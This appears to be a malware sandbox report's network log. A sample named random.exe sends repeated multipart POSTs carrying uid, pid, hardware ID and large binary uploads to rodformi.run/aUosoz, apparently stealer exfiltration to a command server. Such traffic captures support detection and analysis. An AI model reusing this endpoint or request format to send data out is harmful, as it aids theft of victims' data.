                                                                                              2025-04-02 09:33:24 UTC14903OUTData Raw: 2d 2d 4d 59 49 31 68 59 76 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 36 30 62 39 66 39 65 35 34 37 36 65 35 61 64 64 65 62 64 33 35 65 65 37 38 33 31 39 33 34 34 38 32 30 63 39 34 32 36 37 38 64 63 62 61 33 63 38 33 31 30 66 39 37 37 37 0d 0a 2d 2d 4d 59 49 31 68 59 76 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 59 49 31 68 59 76 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 45 32 35 35 33 38 35 42 46 41 32 39 44 44 46 33 45
                                                                                              Data Ascii: --MYI1hYv5Content-Disposition: form-data; name="uid"60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777--MYI1hYv5Content-Disposition: form-data; name="pid"2--MYI1hYv5Content-Disposition: form-data; name="hwid"BAE255385BFA29DDF3E
                                                                                              2025-04-02 09:33:24 UTC810INHTTP/1.1 200 OK
                                                                                              Date: Wed, 02 Apr 2025 09:33:24 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qmes6fqWYoZEVSYxXwOpvCmlOMT8msqGTE9Fgi8%2FwERjT0ccRoaHAerwA%2B%2Fv3Pg5JJseilzjgEw3Q9kgi56XDo8tgtl%2BSoDt%2F%2F5nfMzSTvWMuTfWfPadMixUKvS4bWo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 929f5311ff1d42da-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=97513&min_rtt=97314&rtt_var=20828&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2826&recv_bytes=15832&delivery_rate=38049&cwnd=252&unsent_bytes=0&cid=bb2d27f1671545bc&ts=750&x=0"
                                                                                              2025-04-02 09:33:24 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                                              Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                                              2025-04-02 09:33:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.1049683172.67.197.674436208C:\Users\user\Desktop\random.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-04-02 09:33:25 UTC280OUTPOST /aUosoz HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=UG43df94ljvlU3YQz
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                              Content-Length: 15075
                                                                                              Host: rodformi.run
                                                                                              2025-04-02 09:33:25 UTC15075OUTData Raw: 2d 2d 55 47 34 33 64 66 39 34 6c 6a 76 6c 55 33 59 51 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 36 30 62 39 66 39 65 35 34 37 36 65 35 61 64 64 65 62 64 33 35 65 65 37 38 33 31 39 33 34 34 38 32 30 63 39 34 32 36 37 38 64 63 62 61 33 63 38 33 31 30 66 39 37 37 37 0d 0a 2d 2d 55 47 34 33 64 66 39 34 6c 6a 76 6c 55 33 59 51 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 47 34 33 64 66 39 34 6c 6a 76 6c 55 33 59 51 7a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68
                                                                                              Data Ascii: --UG43df94ljvlU3YQzContent-Disposition: form-data; name="uid"60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777--UG43df94ljvlU3YQzContent-Disposition: form-data; name="pid"2--UG43df94ljvlU3YQzContent-Disposition: form-data; name="h
                                                                                              2025-04-02 09:33:26 UTC264INHTTP/1.1 200 OK
                                                                                              Date: Wed, 02 Apr 2025 09:33:26 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Server: cloudflare
                                                                                              Vary: Accept-Encoding
                                                                                              Cf-Cache-Status: DYNAMIC
                                                                                              CF-RAY: 929f531b6b31aa2a-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2025-04-02 09:33:26 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                                              Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                                              2025-04-02 09:33:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.1049684172.67.197.674436208C:\Users\user\Desktop\random.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-04-02 09:33:26 UTC281OUTPOST /aUosoz HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=MG2zEvW86fpUbh578x
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                              Content-Length: 20444
                                                                                              Host: rodformi.run
                                                                                              2025-04-02 09:33:26 UTC15331OUTData Raw: 2d 2d 4d 47 32 7a 45 76 57 38 36 66 70 55 62 68 35 37 38 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 36 30 62 39 66 39 65 35 34 37 36 65 35 61 64 64 65 62 64 33 35 65 65 37 38 33 31 39 33 34 34 38 32 30 63 39 34 32 36 37 38 64 63 62 61 33 63 38 33 31 30 66 39 37 37 37 0d 0a 2d 2d 4d 47 32 7a 45 76 57 38 36 66 70 55 62 68 35 37 38 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4d 47 32 7a 45 76 57 38 36 66 70 55 62 68 35 37 38 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65
                                                                                              Data Ascii: --MG2zEvW86fpUbh578xContent-Disposition: form-data; name="uid"60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777--MG2zEvW86fpUbh578xContent-Disposition: form-data; name="pid"3--MG2zEvW86fpUbh578xContent-Disposition: form-data; name
                                                                                              2025-04-02 09:33:26 UTC5113OUTData Raw: b3 57 4b 02 d4 6b f5 96 43 f7 88 13 33 e3 24 31 0b ed 8f c7 33 20 5e 80 79 a4 d8 9e ae ff bb 65 ea c1 eb 8a 17 9e 48 cd 69 18 f8 86 02 85 2b 05 2d 82 ac 8b 01 4f df 46 fe ba 69 ed 8e 78 0a c6 be 48 a6 b1 3f fd 16 2f d6 8f 1c 46 ef 96 82 05 9a 38 f4 97 87 23 f2 8a d5 2f a3 b6 c8 3d 33 27 47 de 06 c4 c6 b5 d0 a6 96 5b a6 b6 60 c6 0e ca 56 e5 79 66 87 1f e6 ee ba cd c8 c5 0a 59 dc b9 58 61 3c ae ed b4 d2 74 b9 e7 67 a5 fb 7e 23 a4 9a 44 96 c4 3c ca fa 1b 08 a9 d3 f1 63 d2 d9 88 db b5 ec 8c bf c0 28 99 3c bb 8d f2 ce 53 e5 41 eb d6 28 48 3c d3 12 fd 25 d1 75 2b 75 03 10 9e cf b2 16 05 ab c3 78 71 56 95 b9 80 e7 15 8c 27 c8 93 43 94 c9 3e 33 6f c6 b1 48 60 fe e6 7d e3 9d d3 65 e1 60 ad a2 1f fc 2c a8 39 0f aa e3 e3 7c 06 d2 21 b1 c0 62 bd cf 03 eb e0 61 3a 67
                                                                                              Data Ascii: WKkC3$13 ^yeHi+-OFixH?/F8#/=3'G[`VyfYXa<tg~#D<c(<SA(H<%u+uxqV'C>3oH`}e`,9|!ba:g
                                                                                              2025-04-02 09:33:27 UTC808INHTTP/1.1 200 OK
                                                                                              Date: Wed, 02 Apr 2025 09:33:27 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1tuvbzUa9pms6WRriXvhdWljHFBsBDujXqUV5OMGR2wG%2FSWUKYcPysi9Qx%2FbYc4Yj3pz9vsSJtKWk43hHulST%2Bjh000rsVv%2Bq54H6LrMP2Ej%2Bu48nQVqD5kfnN9JsU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 929f53227e8f83d0-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=97394&min_rtt=97351&rtt_var=20601&sent=13&recv=24&lost=0&retrans=0&sent_bytes=2827&recv_bytes=21405&delivery_rate=38218&cwnd=246&unsent_bytes=0&cid=3f0c39ac58aae846&ts=651&x=0"
                                                                                              2025-04-02 09:33:27 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                                              Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                                              2025-04-02 09:33:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              4192.168.2.1049685172.67.197.674436208C:\Users\user\Desktop\random.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-04-02 09:33:28 UTC272OUTPOST /aUosoz HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=6vE51zQQh0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                              Content-Length: 2556
                                                                                              Host: rodformi.run
                                                                                              2025-04-02 09:33:28 UTC2556OUTData Raw: 2d 2d 36 76 45 35 31 7a 51 51 68 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 36 30 62 39 66 39 65 35 34 37 36 65 35 61 64 64 65 62 64 33 35 65 65 37 38 33 31 39 33 34 34 38 32 30 63 39 34 32 36 37 38 64 63 62 61 33 63 38 33 31 30 66 39 37 37 37 0d 0a 2d 2d 36 76 45 35 31 7a 51 51 68 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 76 45 35 31 7a 51 51 68 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 41 45 32 35 35 33 38 35 42 46 41 32
                                                                                              Data Ascii: --6vE51zQQh0Content-Disposition: form-data; name="uid"60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777--6vE51zQQh0Content-Disposition: form-data; name="pid"1--6vE51zQQh0Content-Disposition: form-data; name="hwid"BAE255385BFA2
                                                                                              2025-04-02 09:33:29 UTC804INHTTP/1.1 200 OK
                                                                                              Date: Wed, 02 Apr 2025 09:33:29 GMT
                                                                                              Content-Type: application/json
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Vary: Accept-Encoding
                                                                                              cf-cache-status: DYNAMIC
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EuLEhElA0FYicSrUkAUKf3bKU%2BM3Embw2mu2iafN5g3zplhjKGwSe3rov7VWYY4t%2BC%2BFRbGd7nLymJoUiUWRxFQl4ICnzSlI9e16xCG5woSajjXId%2FM5wKGTVbCBjqo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 929f532e5e408cdd-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=98598&min_rtt=97782&rtt_var=21481&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2827&recv_bytes=3464&delivery_rate=38100&cwnd=231&unsent_bytes=0&cid=203b244b6be4ccc6&ts=534&x=0"
                                                                                              2025-04-02 09:33:29 UTC73INData Raw: 34 33 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 22 7d 7d 0d 0a
                                                                                              Data Ascii: 43{"success":{"message":"message success delivery from 161.77.13.2"}}
                                                                                              2025-04-02 09:33:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              5192.168.2.1049686172.67.197.674436208C:\Users\user\Desktop\random.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-04-02 09:33:29 UTC279OUTPOST /aUosoz HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: multipart/form-data; boundary=zKMWnlQnU1r08E6
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                                                              Content-Length: 550482
                                                                                              Host: rodformi.run
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: 2d 2d 7a 4b 4d 57 6e 6c 51 6e 55 31 72 30 38 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 36 30 62 39 66 39 65 35 34 37 36 65 35 61 64 64 65 62 64 33 35 65 65 37 38 33 31 39 33 34 34 38 32 30 63 39 34 32 36 37 38 64 63 62 61 33 63 38 33 31 30 66 39 37 37 37 0d 0a 2d 2d 7a 4b 4d 57 6e 6c 51 6e 55 31 72 30 38 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 7a 4b 4d 57 6e 6c 51 6e 55 31 72 30 38 45 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a
                                                                                              Data Ascii: --zKMWnlQnU1r08E6Content-Disposition: form-data; name="uid"60b9f9e5476e5addebd35ee78319344820c942678dcba3c8310f9777--zKMWnlQnU1r08E6Content-Disposition: form-data; name="pid"1--zKMWnlQnU1r08E6Content-Disposition: form-data; name="hwid"
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: 91 ff 26 32 b0 3c 60 c1 69 e1 a4 7b 71 a0 80 ac df 68 ce 6c 45 cf 1b b4 0b d6 f4 86 ac ef c4 d9 99 49 4a 4f 6d 69 74 7f d3 64 5f 31 9f ae 97 65 1b 3c 95 dc ef 5a 3f 8d fb cb 92 cb 5e b8 64 6f ef 21 58 3f 6a 42 6e 17 09 a2 44 15 a3 56 1c 8a 1c e5 4b 2f 8b bf 4b 6b d8 1f 98 35 57 7f ec 5a eb a9 77 3b ea f8 9f ac 22 b1 cb 5f bc 10 29 57 35 60 8b b6 66 37 e4 0f 71 9a 2a 31 a1 93 53 be 76 36 b0 4a ac a0 ac 88 f0 49 cd 2e 71 a2 c0 c6 40 ae d6 c8 a0 a3 f6 19 7e 57 94 ee b3 ff 06 7e 4e 29 03 23 24 64 e1 ab 9d 00 81 36 23 7f 49 45 64 92 8e 05 ed e7 0a 46 17 53 44 77 3a cb 5d 30 c5 86 05 15 ca f4 8d 66 fb cd 27 53 fe dc 8a e8 ea f1 7e ef 46 5b 49 cc 71 4e 54 f6 66 da e0 c0 d1 d7 3f 3e 27 44 d0 5c d6 62 17 a9 90 b2 93 8b ca 3a e8 f9 e2 ff 7a 67 1d 41 ae 3a 80 97 31
                                                                                              Data Ascii: &2<`i{qhlEIJOmitd_1e<Z?^do!X?jBnDVK/Kk5WZw;"_)W5`f7q*1Sv6JI.q@~W~N)#$d6#IEdFSDw:]0f'S~F[IqNTf?>'D\b:zgA:1
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: c6 35 60 85 db 8b a2 55 11 d9 76 60 6e 57 df 14 7d d3 b9 53 b2 3e 1e 6c 5c d7 bc 4e 3f 98 57 b1 b9 e9 6d ff 42 66 2a d7 51 79 49 13 58 ac 7a 55 0a e1 c2 cc 5f d8 66 01 f6 16 fc 01 22 85 b0 20 1d 83 84 25 38 7e bf c0 9c a5 41 51 19 bb b8 f0 e7 86 98 98 f0 e6 49 df 0d 1d 41 c9 1b 4c 60 0f 47 ce 0d 8f 3b 68 ad 34 1f 2f 7f 7e 32 0d 1a f2 e5 bf ec ee 8b 46 9d 95 0f 89 ee 5c 2f 3e 15 c5 79 f3 ff 3f 52 00 b1 87 cb a9 66 df 2b 48 0e 39 f2 88 ef 99 95 ae b6 27 ee df 2a ed 21 1d 8d 15 cb f8 ee 9f 69 47 ab 4b 39 f4 fd ba 58 f2 18 8e d6 21 7f 17 d6 ba be c9 8f 31 5a 61 22 f1 f8 d0 73 b2 45 1d 4c e8 ef 72 13 37 87 c3 d8 b3 27 a4 c5 44 04 ac 06 2c 54 fb 84 9a 9a ba ab 86 a7 8d ba 24 70 35 f6 84 00 fd d5 31 dd 25 b2 98 2d 57 c5 77 87 fc 36 26 ad 20 a5 e4 f6 ba fe db 2e
                                                                                              Data Ascii: 5`Uv`nW}S>l\N?WmBf*QyIXzU_f" %8~AQIAL`G;h4/~2F\/>y?Rf+H9'*!iGK9X!1Za"sELr7'D,T$p51%-Ww6& .
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: 28 9d f8 28 a6 dd 3e 04 0e c4 21 62 e7 11 66 bb 44 4a 71 53 8c c3 71 b6 1d 51 c4 2e 72 9b 3d 52 6c 2f 8f f0 d5 47 4c 67 70 f5 49 7c 55 fd a7 d7 52 18 cf 88 2b 57 5e f6 00 36 5a 51 b4 ac b9 7a 81 e1 b5 54 a8 1a a3 f9 25 e4 90 92 00 12 9d 6c 92 4a 5d 28 02 12 b1 55 87 ea 4c f0 ea 50 a7 04 db 0b 92 40 10 02 65 4c 22 47 90 13 66 12 70 56 5d 43 26 6a 4f bc d2 6b e2 9d f0 97 2b a9 3f 1c b6 3f 16 8e fa 23 6f 24 a7 9a 88 1e 06 bc 04 b9 ff 44 b7 3b ed 78 0b 40 7b c3 ab 68 16 5d f6 46 a0 d6 fe 2d b6 22 84 8c 12 b5 d6 92 58 39 a5 24 67 99 27 57 93 d4 5d f6 60 9d 94 f1 70 b0 88 9e 75 53 d6 75 19 fb 90 53 48 51 8f d7 79 f8 00 c6 b5 dc 57 55 38 76 ec 5e 7e cf c4 29 33 67 e4 34 2b 93 e3 7e d2 cc f0 15 89 6c cb 9e f1 8d d1 90 c4 12 9f 67 c0 28 10 bf 57 48 98 7b 48 8e a8
                                                                                              Data Ascii: ((>!bfDJqSqQ.r=Rl/GLgpI|UR+W^6ZQzT%lJ](ULP@eL"GfpV]C&jOk+??#o$D;x@{h]F-"X9$g'W]`puSuSHQyWU8v^~)3g4+~lg(WH{H
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: cb 03 e3 f8 94 6b 34 a0 94 42 43 3f a5 53 ef 89 27 48 3d de 1d b6 50 91 37 8c 51 96 cb 69 e6 15 9b fc 28 29 ff dd 58 dc 39 6a 38 a0 67 ce d5 61 12 01 05 0a 4b 43 f3 23 e8 8f a0 49 93 00 dd 8f a1 1d f6 ea 66 85 37 70 07 2e a3 cb cf bd bc d3 23 89 d6 e6 06 0d 82 cb 5e 2e 96 03 67 d1 55 39 70 91 39 3b c6 57 b8 a7 4a f2 ff 52 17 af a2 ce 53 7c 80 da f4 8c 66 2a 5b 3a 0e 40 7e 3a 66 b6 5a 3f ff 20 1b 72 e7 fb 16 d7 21 a5 6d d3 7d 2b 7d f7 17 78 c3 6b c6 b9 c9 82 a6 bb 91 40 de b9 54 ad c0 32 8e 31 aa 74 ca e7 55 43 b0 77 5e 0c 8f 21 a2 c8 00 7d 08 bc 93 17 bf 4c 73 fc dd 40 03 6c ef f8 79 58 b9 65 81 34 12 ce dc 0c 1f 84 a8 16 fc 1a 3b 26 01 32 12 70 21 ec 20 07 7a d9 88 83 50 4b 9b 7e bd 57 1d f3 08 58 73 ec fc 8d 95 c4 b4 c1 75 09 d7 f0 cc 6f 60 19 09 e6 b4
                                                                                              Data Ascii: k4BC?S'H=P7Qi()X9j8gaKC#If7p.#^.gU9p9;WJRS|f*[:@~:fZ? r!m}+}xk@T21tUCw^!}Ls@lyXe4;&2p! zPK~WXsuo`
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: 89 0f 26 81 0b 61 b1 8d d7 9c c5 d6 e5 79 0b a0 5e 61 cb 43 a5 d1 43 25 42 33 d1 06 62 ce 44 75 97 8c 36 64 e9 ea 45 dc 37 f4 ce 61 72 66 19 4a 16 d7 a5 de 38 14 56 21 b3 01 e7 bc 8a 66 c7 fb 14 f8 1f 54 83 26 1a 5c 6a b5 79 11 fa 0f 7d 66 1c dd 55 24 cd 02 ec d8 15 ca da 5b 3d 9a 57 9a d6 06 b1 77 ae ce aa be dd 9c 23 5d 5f 57 1a 14 2b 24 4f 66 e4 54 5a bc 37 3a f7 05 9c 75 57 28 e6 59 12 d5 dc 6b ba 09 b0 f7 4b 64 c7 e0 fd 4f 17 92 19 43 c7 7f bc 26 a4 20 73 8a 15 f5 59 51 d8 28 93 9b 27 6b 87 3c 9c 51 b4 de a4 6e 05 7e 1c de b9 09 0f ff af dd f5 c1 03 ac f6 72 9d 7f a5 e4 e9 26 4b 20 53 1a a3 86 a6 f8 55 70 6c 61 3e 56 e4 58 81 c9 f8 c3 be 3f e6 83 d3 da 31 3e f1 89 0e 80 18 31 95 2e 75 53 81 82 b8 65 e6 cb bd bf 00 68 8c 56 bf ee f9 23 c5 ea 98 43 22
                                                                                              Data Ascii: &ay^aCC%B3bDu6dE7arfJ8V!fT&\jy}fU$[=Ww#]_W+$OfTZ7:uW(YkKdOC& sYQ('k<Qn~r&K SUpla>VX?1>1.uSehV#C"
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: 7c 67 cb 6b 18 21 1d 1a 46 4c cf 64 b7 19 7d db 8d ec e9 c9 0e 66 0b eb 1d f5 20 2d a2 e3 61 eb a2 04 ef 57 ac 6e 88 12 ea 9a 8e 6a 64 5c 22 c0 12 fb 13 08 94 37 6a f8 f2 39 c5 d5 76 79 0d f7 0d 8c a1 59 25 7b 7a 4b a2 79 42 ca 5e a2 89 4c f2 50 af 92 0e f0 05 04 ee 9e d4 1c 9a fd f2 07 a8 84 f1 0e bb 3c b0 b1 1a df 58 2e 23 dc ae 88 d7 67 c4 b3 a3 8b f2 66 1e 83 0b 6d 41 47 f4 8c 30 74 bf eb e7 50 70 78 c6 87 6e 3d d7 e4 a8 18 52 7a 5e 9a 92 97 98 39 e6 0c 39 a8 01 ad 03 ea 39 4f e2 9e 8f 0e 95 02 b7 97 c2 9d 36 39 81 00 ae 5e ec a2 9a 31 a5 dd f1 17 ca 86 1f ea cb 5c f3 9f d7 a9 a9 c7 93 b2 50 ea 1e 59 73 14 6d be 53 d3 85 7b 3b e0 be 66 c8 04 0a 05 52 fd 60 69 37 61 45 01 25 8e 4f 4e 13 2f cb 15 6e 63 60 6b f6 32 46 eb d2 10 9b 5a 22 9b d7 98 3e 5a c2
                                                                                              Data Ascii: |gk!FLd}f -aWnjd\"7j9vyY%{zKyB^LP<X.#gfmAG0tPpxn=Rz^999O69^1\PYsmS{;fR`i7aE%ON/nc`k2FZ">Z
                                                                                              2025-04-02 09:33:29 UTC15331OUTData Raw: e6 38 08 b0 f8 27 48 75 1e 75 79 bb b2 6c 2c 91 1b 2b 69 a8 4b e4 2b 4d 86 f0 a0 3e f3 b8 e3 3d 11 7d 01 0a d5 49 81 cc 02 ec 96 9a 58 b3 a1 e4 ac 4c c2 f4 4b 81 38 c0 0d 37 c0 b1 03 a1 38 3a e7 12 c8 ae d5 62 46 1d 7f 91 54 ab 0b af 7b 0e f0 b1 b0 ae 26 3e df b2 aa 6d 0c c6 5b 81 af 24 71 b7 1b 56 6b bc b6 d9 44 9e 95 ea 9c 28 1b 79 bc d0 92 2e 72 de 83 d2 17 03 f6 34 c4 d9 69 54 3d cf 32 28 d5 06 99 de 08 bd e5 1e 35 9a 78 b2 65 cc 25 bd a3 40 b3 ab 59 b1 b2 26 04 1a 6c 7b bc 97 e4 44 fa ad fc 52 9e 53 3b 50 5f f2 3d 1c 94 81 87 e1 0c 37 31 bd 7e 9d 28 5c 9f 61 cc b3 a9 9d 17 6d 3f 9d 6f 7f c9 b2 c6 ca 61 28 42 bb 13 b6 da df 25 ac ed f9 c6 27 82 52 d4 b7 76 fa bd 77 95 8a d0 6b 9b af fd a8 16 1e be b6 89 44 42 52 5a ef af 6e 86 48 52 03 6d 35 69 37 2e
                                                                                              Data Ascii: 8'Huuyl,+iK+M>=}IXLK878:bFT{&>m[$qVkD(y.r4iT=2(5xe%@Y&l{DRS;P_=71~(\am?oa(B%'RvwkDBRZnHRm5i7.
